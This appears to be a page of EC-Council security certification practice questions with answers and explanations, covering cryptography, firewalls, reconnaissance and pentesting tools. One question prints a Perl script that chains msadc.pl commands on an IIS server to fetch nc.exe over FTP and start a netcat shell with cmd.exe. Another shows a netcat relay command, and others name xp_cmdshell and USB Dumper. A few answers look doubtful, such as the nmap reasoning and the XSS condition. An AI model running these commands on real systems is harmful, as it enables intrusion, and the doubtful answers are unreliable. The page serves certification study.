Certified Ethical Hacker (CEH) Practice Exams

Through which type of method is information collected during the passive reconnaissance?

Options are :

  • Social engineering
  • Network traffic sniffing
  • Man in the middle attacks
  • Publicly accessible sources (Correct)

Answer : Publicly accessible sources

Explanation Passive reconnaissance focuses on collecting information that is widely and openly available from publicly accessible sources. While network traffic sniffing is considered to be a passive activity, gaining access to the network to place a sniffer in a good network tap location would not be considered passive. Of the choices provided, Publicly Accessible Sources is the BEST answer.

ECCouncil 412-79 Certified Security Analyst (ECSA) Exam Set 5

Which is NOT an asymmetric cryptographic standard?

Options are :

  • DSA
  • PKI
  • RSA
  • 3DES (Correct)

Answer : 3DES

Explanation 3DES is a symmetric cryptographic standard. Triple DES (3DES), officially the Triple Data Encryption Algorithm (TDEA or Triple DEA), is a symmetric-key block cipher, which applies the DES cipher algorithm three times to each data block. All of the other options are asymmetric cryptographic methods.

What is a component of a risk assessment?

Options are :

  • Physical security
  • Administrative safeguards (Correct)
  • DMZ
  • Logical interface

Answer : Administrative safeguards

Explanation Administrative safeguards focus on internal organization, policies, procedures, and maintenance of security measures that protect patient health information. They are a specific subset of the HIPPA Security Rules and are critical in securing healthcare data. The other options all represent either physical or technical safeguards, as defined by HIPPA.

What data-gathering activities are performed during a risk assessment?

Options are :

  • Threat identification, vulnerability identification, control analysis (Correct)
  • Threat identification, response identification, mitigation identification
  • Attack profile, defense profile, loss profile
  • System profile, vulnerability identification, security determination

Answer : Threat identification, vulnerability identification, control analysis

Explanation Threat identification, vulnerability identification, and a risk control analysis should be performed as part of a comprehensive risk assessment according to the NIST SP 800-39 (NIST Cybersecurity Framework).

EC0-349 ECCouncil Computer Hacking Forensic Investigator Set 1

In your company, all email messages are required to be digitally signed when sent through an insecure channel (such as the Internet). By using a digital signature, the receiver of the message receives a validation that the message was sent by the original sender, providing integrity and non-repudiation. The digital signature consists of a message digest (hash) that is encrypted with what kind of encryption key?

Options are :

  • Public key of the sender
  • Private key of the receiver
  • Public key of the receiver
  • Private key of the sender (Correct)

Answer : Private key of the sender

Explanation A digital signature is simply a hash of the email message which is then encrypted with the sender's private key. This can be unencrypted by anyone with access to the sender's public key, therefore there is no confidentiality gained. But, since only the sender has access to their private key, there is non-repudiation. The hashing of the email is what creates the integrity.

At what level of the OSI model does a circuit-level gateway firewall operate?

Options are :

  • Layer 5 - Session (Correct)
  • Layer 4 – Transport
  • Layer 3 – Network
  • Layer 2 – Data link

Answer : Layer 5 - Session

Explanation Circuit-level gateway firewall works at the session layer (layer 5) of the OSI model, between the application layer and the transport layer of the TCP/IP stack. These firewalls monitor TCP handshaking between packets to determine whether a requested session is actually legitimate.

What problem can be caused by low humidity in a data center?

Options are :

  • Heat
  • Corrosion
  • Static electricity (Correct)
  • Airborne contamination

Answer : Static electricity

Explanation Low humidity in a data center can cause a buildup of static electricity. To minimize this, it is recommended that a data center maintain a humidity level of 45-55%. If the humidity gets too high, corrosion of the components could occur.

EC0-232 EC-Council E-Commerce Architect Practice Test Set 8

A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the web server. While the msadc.pl script is effective, the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:

system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");
system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\"");
$o=print "Opening FTP connection...\n";system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");

Which exploit is indicated by this script?

Options are :

  • Buffer overflow exploit
  • Chained exploit (Correct)
  • SQL injection exploit
  • Denial of Service exploit

Answer : Chained exploit

Explanation This is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and ftp usage. Chained exploits integrate more than one form of attack to accomplish their goal.

What process sends specially crafted packets to a remote host and analyzes the responses received from the remote host’s operating system?

Options are :

  • Passive fingerprinting
  • Reflective fingerprinting
  • Active fingerprinting (Correct)
  • Distributive fingerprinting

Answer : Active fingerprinting

Explanation Active fingerprinting is the process of transmitting packets to a remote host and analyzing corresponding replies.

An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pdf modifier. The attacker was able to locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?

Options are :

  • Cupp
  • Nessus scripting engine
  • Cain and Abel (Correct)
  • John The Ripper Pro

Answer : Cain and Abel

Explanation Cain and Abel is a popular password cracking tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding, too. CUPP is used to create password lists. Nessus is a vulnerability scanner. John the Ripper is a password cracking tool, but cannot specifically target Cisco VPN configuration files like Cain and Abel can.

312-50v7 Ethical Hacking and Countermeasures V7 Part 2 Exam Set 5

A Certificate Authority (CA) generates a key pair that will be used for encryption and decryption of emails. If you are worried about the integrity of an encrypted email, what must be protected?

Options are :

  • Public key
  • Private key (Correct)
  • Modulus length
  • Email server certificate

Answer : Private key

Explanation The integrity of an encrypted email is assured through the use of digital signatures. A digital signature is a hash of the email which is then encrypted using the sender's private encryption key.

You are trying to setup a PCAP filter in Wireshark to capture all TCP traffic going to or from a host with an IP address of 10.0.0.26 over port 143. What should your filter include?

Options are :

  • tcp.src == 143 and ip.host == 10.0.0.26
  • host 10.0.0.26:143
  • port 143 and host 10.0.0.26
  • tcp.port == 143 and ip.host == 10.0.0.26 (Correct)

Answer : tcp.port == 143 and ip.host == 10.0.0.26

Explanation Using tcp.port == 143 and ip.host == 10.0.0.26 will set your PCAP filter to only capture traffic going to or from port 143, and to or from host 10.0.0.26.

What is the name of a strong post designed to stop a car?

Options are :

  • Gate
  • Fence
  • Bollard (Correct)
  • Reinforced concrete

Answer : Bollard

Explanation A bollard is a sturdy, short, vertical post. Although it originally described a post on a ship or quay used principally for mooring boats, the word is now used, primarily to describe posts installed to control road traffic and posts designed to prevent car ramming attacks.

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Exam Set 5

What command would a pentester use to determine the settings of the built-in Windows firewall once they have gained access to a Windows application server?

Options are :

  • netsh firewall show config (Correct)
  • WMIC firewall show config
  • net firewall show config
  • ipconfig firewall show config

Answer : netsh firewall show config

Explanation Netsh commands for Windows Firewall provide a command-line alternative to the capabilities of the Windows Firewall Control Panel utility. By using the Netsh firewall commands, you can configure and view Windows Firewall exceptions and configuration settings.

What is the Advanced Encryption Standard (AES) algorithm used for?

Options are :

  • Data integrity
  • Key discovery
  • Bulk data encryption (Correct)
  • Key recovery

Answer : Bulk data encryption

Explanation AES is an encryption algorithm used to provide data encryption.

Which of these statement is true concerning LM hashes?

Options are :

  • LM hashes consist in 48 hexadecimal characters
  • LM hashes are based on AES128 cryptographic standard
  • Uppercase characters in the password are converted to lowercase
  • LM hashes are not generated when the password length exceeds 14 characters (Correct)

Answer : LM hashes are not generated when the password length exceeds 14 characters

Explanation LM hash, also known as LanMan hash or LAN Manager hash, is a compromised password hashing function that was the primary hash that Microsoft LAN Manager and Microsoft Windows versions prior to Windows NT used to store user passwords. Support for the legacy LAN Manager protocol continued in later versions of Windows for backward compatibility, but was recommended by Microsoft to be turned off by administrators due to the weak strength of the LM hash. LM hashes are not generated when the password length exceeds 14 characters since it is stored as a 16-byte value.

EC1-349 ECCouncil Computer Hacking Forensic Investigator Set 2

An attacker has issued the following command:
nc -l -p 8080 | nc 192.168.1.76 443.

Based on this command, what will occur?

Options are :

  • Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080.
  • Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443. (Correct)
  • Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080.
  • Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76.

Answer : Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443.

Explanation The proper syntax for netcat (nc) is –l to signify listening and –p to specify the listening port. Then, the | character allows multiple commands to be run during a single command execution. Next, netcat is being told to send the data to the given IP (192.168.1.76) over port 443. This is a common technique to try to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

What technique is most effective in determining whether or not increasing end-user security training would be beneficial to the organization during your technical assessment of their network?

Options are :

  • Vulnerability scanning
  • Social engineering (Correct)
  • Application security testing
  • Network sniffing

Answer : Social engineering

Explanation Social engineering refers to psychological manipulation of people into performing actions or divulging confidential information. During your technical assessment, utilizing social engineering techniques such as phishing or pharming can help you determine if additional end-user security training should be included at the organization. The other three options focuses solely on technical controls, therefore adding end-user training would have no effect on these technology options.

What algorithm and key strength does Public Key Infrastructure (PKI) use?

Options are :

  • RSA, 2048 bit (Correct)
  • AES, 1024 bit
  • RSA, 1024 bit
  • AES, 256 bit

Answer : RSA, 2048 bit

Explanation In PKI, the RSA algorithm is utilized, generally with a key strength of 2048 bits or higher.

ECCouncil ECSS Certified Security Specialist Practice Exam Set 5

What should administrators perform to reduce the attack surface of a system and to remove unnecessary software, services, and insecure configuration settings?

Options are :

  • Harvesting
  • Windowing
  • Hardening (Correct)
  • Stealthing

Answer : Hardening

Explanation Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, the removal of unnecessary software, unnecessary usernames or logins, and the disabling or removal of unnecessary services.

Your organization is choosing new mobile phones for use across the enterprise, and one of the executives requests that you consider Blackberry devices. As a cyber security analyst, you want to evaluate the devices for possible threats. You decided to use a Blackjacking attack to show the executive that the enterprise’s perimeter network defenses could be circumvented by using the Blackberry device and an attacker could gain access to the organization’s network. What tool should you use to perform a Blackjacking attack?

Options are :

  • Burp Suite
  • BBproxy (Correct)
  • BBcrack
  • Blooover

Answer : BBproxy

Explanation BBproxy is a security assessment tool written in Java that runs on Blackberry devices. It allows the Blackberry device to be used as a proxy between the Internet and an internal network, thereby representing a significant security threat to the enterprise.

A cybersecurity analyst is conducting a network audit to determine if there are any deviations from the established security policies. The analyst discovered a user from the IT department had installed a dial-up modem. If the analyst checks to see if dial-up modems are allowed by the organization, what security policy should they review?

Options are :

  • Firewall management policy
  • Acceptable use policy
  • Remote access policy (Correct)
  • Memorandum of understanding policy

Answer : Remote access policy

Explanation The remote access policy is a document which outlines and defines acceptable methods of remotely connecting to the internal network. It is essential in large organization where networks are geographically dispersed and extend into insecure network locations such as public networks or unmanaged home networks. If a dial-up modem is authorized, it would be list as an approved method in the remote access policy.

ECCouncil 412-79 Certified Security Analyst (ECSA) Exam Set 4

The organization has some publicly hosted web applications, as well as an internal Intranet server that is protected by a firewall. What technique will help the organization protect itself against enumeration?

Options are :

  • Reject all invalid emails received via SMTP
  • Allow full DNS zone transfers
  • Remove A records for internal hosts (Correct)
  • Enable null session pipes

Answer : Remove A records for internal hosts

Explanation Any internal server names and IPs should have their A records removed from the external DNS server, since only internal users should need to access them. Those internal servers should only have A records on your internal DNS servers, and those records should not be forwarded outside of the firewall boundary.

A penetration tester hired by a bank began searching for the bank’s IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank’s employees came into and left work, searching job postings (with a special focus on the bank’s information technology jobs), and even searching the corporate office of the bank’s dumpster. Based on this description, what portion of the penetration test is being conducted?

Options are :

  • Information reporting
  • Vulnerability assessment
  • Active information gathering
  • Passive information gathering (Correct)

Answer : Passive information gathering

Explanation Passive information gathering consists of numerous activities where the penetration tester gathers information that is open-source or publicly available, without the organization under investigation being aware that the information has been accessed.

What information from the recipient must the sender have before encrypting a message when sending a message as a PGP encrypted message?

Options are :

  • Private key of the recipient
  • Public key of the recipient (Correct)
  • Master encryption key
  • Public key of the sender

Answer : Public key of the recipient

Explanation In order for the sender to securely encrypt the message, they must have the recipient’s public key. This will ensure that only the recipient can decrypt the message using their own private key, since PGP operates using an asymmetric encryption.

312-50 Certified Ethical Hacker Certification Practice Exam Set 6

What tool is used to copy files from USB devices silently?

Options are :

  • USB Grabber
  • USB Dumper (Correct)
  • USB Sniffer
  • USB Snoopy

Answer : USB Dumper

Explanation USB Dumper runs silently as a background process once started and copies the complete contents of every connected USB device to the system without the knowledge of the user. It creates a directory with the current date and begins the background copying process. The user has no indication that the files stored on the USB device are copied from the USB to the local system.

What statement is correct concerning proxy firewalls?

Options are :

  • Increase the speed and functionality of a network
  • Decentralize all activity for an application
  • Block network packets from passing to and from a protected network
  • Clients establish a connection with the proxy firewall to initiate a new network connection (Correct)

Answer : Clients establish a connection with the proxy firewall to initiate a new network connection

Explanation A proxy firewall is a network security system that protects network resources by filtering messages at the application layer. A proxy firewall may also be called an application firewall or gateway firewall. Just like a proxy server or cache server, a proxy firewall acts as an intermediary between in-house clients and servers on the Internet. Clients first establish a connection with a proxy firewall, and then a new network connection is initiated on the client’s behalf.

A penetration tester found a target that is running Microsoft SQL 2005 with default credentials. They assumed that the service is running with the Local System account credentials. What weakness could the penetration tester exploit to access the system?

Options are :

  • Using the Metasploit psexec module setting the SA/Admin credential
  • Invoking the stored procedure xp_shell to spawn a Windows command shell
  • Invoking the stored procedure cmd_shell to spawn a Windows command shell
  • Invoking the stored procedure xp_cmdshell to spawn a Windows command shell (Correct)

Answer : Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

Explanation By invoking the xp_cmdshell, a Windows command shell will be spawned and the input string passed to it for execution. This could provide the penetration tester with local system level access to the server.

ECCouncil 712-50 Certified CISO (CCISO) Practice Exam Set 4

What is the main disadvantage of using a scripting languages instead of a compiled programming languages?

Options are :

  • They are harder to learn
  • They are not object-oriented
  • They cannot be used to create graphical user interfaces
  • They are slower because they require an interpreter to run the code (Correct)

Answer : They are slower because they require an interpreter to run the code

Explanation Scripting languages like Python and PHP have become quite capable. They are easier to learn, can be object-oriented, and even be used to create graphical user interfaces. But, since they are scripting languages, they tend to run much slower than their compiled counterparts, largely in part to the need for an interpreter to be used to run the scripts.

If a penetration tester would like to scan every TCP registered port with fingerprinting and service detection from a Class B network that is blocking ICMP, which NMAP command should they use?

Options are :

  • nmap -PN -A -O –p 1-1024 -sS 172.16.1.0/16
  • nmap -P0 -A -O –p 1-1024 172.16.1.0/16 (Correct)
  • nmap -P0 -A -sT –p 0-65535 172.16.1.0/24
  • nmap -PN -O -sS -p 1-65535 172.16.1.0/8

Answer : nmap -P0 -A -O –p 1-1024 172.16.1.0/16

Explanation There are several ways to answer this question, even if you don’t remember ever piece of the NMAP syntax. First, the question asks you to scan a Class B network, and if we want to scan the entire Class B, we would have to scan a /16. This removed two of our four choices. Now, considering the last two choices, we have two major differences: -PN and –P0. –PN is used to disable host discovery and only conduct a port scan, which isn’t what we want in this case since we also want fingerprinting and service detection. –P0 is used to tell NMAP to skip the pinging process and go right to scanning. This is useful in our case, because we know the network is blocking ICMP (ping traffic). Therefore, we choose NMAP -P0 -A -O –p 1-1024 172.16.1.0/16.

When trying to prevent Web Application attacks, what is TRUE regarding network firewalls?

Options are :

  • Network firewalls can prevent attacks because they can detect malicious HTTP traffic.
  • Network firewalls cannot prevent attacks because ports 80 and 443 must be opened (Correct)
  • Network firewalls can prevent attacks if they are properly configured
  • Network firewalls cannot prevent attacks because they are too complex to configure

Answer : Network firewalls cannot prevent attacks because ports 80 and 443 must be opened

Explanation The only way a network firewall can truly prevent a Web Application attack would be to block web application traffic on ports 80 and 443. But, if you blocked this traffic, you would deny web services to all of the users of the network. For this reason, network firewalls are considered ineffective in preventing Web Application attacks, and you should instead use a Web Application Firewall (WAF) to prevent Web Application attacks like Cross-Site Scripting (XSS) and SQL injection attacks.

ECCouncil 412-79v8 Certified Security Analyst (ECSA) Exam Set 2

A penetration test indicated that Voice Over IP (VOIP) traffic is occurring over the network. What tool could be used to decode a packet capture and extract the voice conversation for analysis?

Options are :

  • Cain & Abel (Correct)
  • John the Ripper
  • Nikto
  • Hping

Answer : Cain & Abel

Explanation Voice over IP (also called VoIP, IP Telephony, and Internet. telephony) is technology enabling routing of voice conversations over. the Internet or any other IP network. Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless passphrases/keys, and more.

Your organization just completed an external security audit which showed that the network had been breached on several occasions during the past 6 months. You have been asked to investigate, and you discovered your IDS was not properly configured. Due to this configuration error, the IDS was not triggering the alerts when appropriate. How would you classify these alerts?

Options are :

  • True Positive
  • False Negative (Correct)
  • False Positive
  • True Negative

Answer : False Negative

Explanation A False Negative occurs when a result appears negative when it should not. In this example, since the alerts were not being displayed/logged when an actual violation was occurring, this would be a false negative.

What is the broadcast address for the subnet 75.61.94.6/22?

Options are :

  • 75.61.94.255
  • 75.61.255.255
  • 75.61.95.255 (Correct)
  • 75.61.93.255

Answer : 75.61.95.255

Explanation When using a /22 subnet, your subnet mask is 255.255.252.0. This will create a wildcard of 0.0.3.255. Therefore, the broadcast becomes 75.61.95.255.

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Exam Set 4

Windows file servers commonly hold sensitive files, databases, passwords and more. What common vulnerability is usually used against a windows file server to expose sensitive files, databases, and passwords?

Options are :

  • Cross-site scripting
  • SQL injection
  • Missing patches (Correct)
  • CRLF injection

Answer : Missing patches

Explanation Missing patches is the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become a victim of the exploit and the data contained on the server can become compromised.

What port and protocol should be opened to send log messages to a log analysis tool residing behind a firewall?

Options are :

  • 123 UDP
  • 541 UDP
  • 514 UDP (Correct)
  • 415 UDP

Answer : 514 UDP

Explanation A syslog server opens port 514 and listens for incoming syslog event notifications (carried by UDP protocol packets) generated by remote syslog clients. Any number of client devices can be programmed to send syslog event messages to the servers.

Diffie-Hellman (DH) groups determine the strength of the key used in the Internet Key Exchange (IKE) process. What is the correct key size of the Diffie-Hellman (DH) Group 14?

Options are :

  • bit key
  • 1024 bit key
  • 1536 bit key
  • 2048 bit key (Correct)

Answer : 2048 bit key

Explanation Group 14 is the minimum acceptable setting for a secure Diffie-Hellman internet key exchange and uses a 2048 bit modulus key. As the group number increases, so does the security of the IKE process.

ECCouncil 312-50 Certified Ethical Hacker Practical Exam Set 4

A hacker successfully modified the sale price of items purchased through your company's web site. During the investigation that followed, the security analyst has verified the web server and Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the mostly likely method that the attacker used to change the sale price of the items purchased?

Options are :

  • SQL injection
  • Changing hidden form values (Correct)
  • Buffer overflow attack
  • Cross-site scripting

Answer : Changing hidden form values

Explanation Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the price of the items in the shopping cart.

What should be done next if the final set of security controls does not eliminate all of the risk in a given system?

Options are :

  • You should continue to apply additional controls until there is zero risk
  • You should ignore any remaining risk
  • You should accept the risk if the residual risk is low enough (Correct)
  • You should remove the current controls since they are not completely effective

Answer : You should accept the risk if the residual risk is low enough

Explanation In most cases, you will be unable to remove all risk. Instead, you should mitigate the risk to a low enough level so that the residual risk can be accepted.

What is an effective method for protecting a router from a smurf attacks?

Options are :

  • Placing the router in broadcast mode
  • Enabling port forwarding on the router
  • Installing the router outside of the network's firewall
  • Disabling the router from accepting broadcast ping messages (Correct)

Answer : Disabling the router from accepting broadcast ping messages

Explanation The Smurf attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address. If you disable the router from accepting broadcast ping messages, you can mitigate a smurf attack from being effective against your network.

ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 1

What encryption level does WPA2 with AES use for wireless data encryption?

Options are :

  • 64 bit and CCMP
  • 128 bit and CRC
  • 128 bit and CCMP (Correct)
  • 128 bit and TKIP

Answer : 128 bit and CCMP

Explanation WPA2 with 128-bit AES encryption with CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol).

A software development company's IDS just generated multiple alerts regarding attacks against their external webserver, VPN concentrator, and DNS servers. What should the security incident response team consider when they begin their investigation and where to start first?

Options are :

  • The maintenance schedule of the affected systems
  • The service level agreements of the systems
  • The potential effect of the incident (Correct)
  • The order that the alerts arrived in

Answer : The potential effect of the incident

Explanation The effort and overall impact of a particular incident should affect where the SIRT begins their investigation and response. This will affect restoration and recovery priorities, as well.

What do Ethereal/Wireshark, TCPDump, and Snort have in common?

Options are :

  • All three are written in Java
  • All three send alerts to security monitors
  • All three use the same packet analysis engine
  • All three use the same packet capture utility (Correct)

Answer : All three use the same packet capture utility

Explanation All three software products use the same packet capture utility. The utility is called libpcap for Linux/OS X and WinPcap for Windows to capture packets travelling over a network and to transmit packets on a network at the link layer to get a list of network interfaces.

ECCouncil 412-79 Certified Security Analyst (ECSA) Exam Set 1

If an attacker uses a communication channel within an operating system that is neither designed nor intended to transfer information, what is the name of that type of channel?

Options are :

  • Classified
  • Overt
  • Encrypted
  • Covert (Correct)

Answer : Covert

Explanation A covert channel transfers information over, within a computer system, or network that is outside of the security policy. It is useful to bypass multi-level security solutions in order to leak data out of a protected network. A good example of this is the use of reserved fields in various packet headers/footers to conceal data. A ping packet, for example, is not designed to contain any data, but in the past attackers have placed data in the ping packets header as a method of creating a covert channel.

A penetration tester finds a web application is vulnerable to Cross Site Scripting (XSS). What condition must be met to exploit this vulnerability?

Options are :

  • Web application does not have the secure flag set
  • Session cookies do not have the HttpOnly flag set (Correct)
  • A user does not have an endpoint security solution
  • The user’s browser must have ActiveX technology enabled.

Answer : Session cookies do not have the HttpOnly flag set

Explanation Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. By not having the HttpOnly flag set for your session cookies, you are vulnerable to a XSS attack.

A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ in order for the Chief Security Officer to be able to work from his home office after hours. What rule should the administrator add to the firewall?

Options are :

  • Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389
  • Permit 143.27.43.32 161.212.71.14 RDP 3389 (Correct)
  • Permit 143.27.43.32 161.212.71.0/24 RDP 3389
  • Permit 143.27.43.0/24 161.212.71.14 RDP 3389

Answer : Permit 143.27.43.32 161.212.71.14 RDP 3389

Explanation Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389? could be correct.

EC-Council Certified Security Analyst (ECSA) Exams 2019 Set 3

What access control solution implements two-factor authentication?

Options are :

  • USB token and PIN (Correct)
  • Fingerprint scanner and retina scanner
  • Password and PIN
  • Username and password

Answer : USB token and PIN

Explanation A usb token (something you have) and a PIN (something you know) is an example of two factor authentication. Fingerprint and retina scanners are both examples of something you are. Username, passwords, and PINs are all examples of something you know.

What is a covert channel?

Options are :

  • A channel that transfers information over, within a computer system, or network that is outside of the security policy (Correct)
  • A channel that transfers information over, within a computer system, or network that is within the security policy
  • A channel that transfers information via a communication path within a computer system, or network for transfer of data
  • A channel that transfers information over, within a computer system, or network that is encrypted.

Answer : A channel that transfers information over, within a computer system, or network that is outside of the security policy

Explanation A covert channel transfers information over, within a computer system, or network that is outside of the security policy. A good example of this is the use of reserved fields in various packet headers/footers to conceal data. A ping packet, for example, is not designed to contain any data, but in the past attackers have placed data in the ping packets header as a method of creating a covert channel.

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions